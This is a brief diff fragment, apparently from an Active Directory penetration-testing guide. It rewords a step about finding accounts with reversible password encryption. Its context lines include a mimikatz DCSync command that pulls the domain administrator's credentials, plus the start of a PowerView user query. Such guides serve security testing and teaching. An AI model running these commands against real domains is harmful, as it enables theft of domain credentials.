Skip to content

 mimikatz # lsadump::dcsync /domain:EXAMPLE.LOCAL /user:EXAMPLE\administrator

-1. Check if user accounts with the reversible encryption option enabled:
+1. Check if any user accounts have the reversible encryption option enabled:

 Get-DomainUser -Identity * |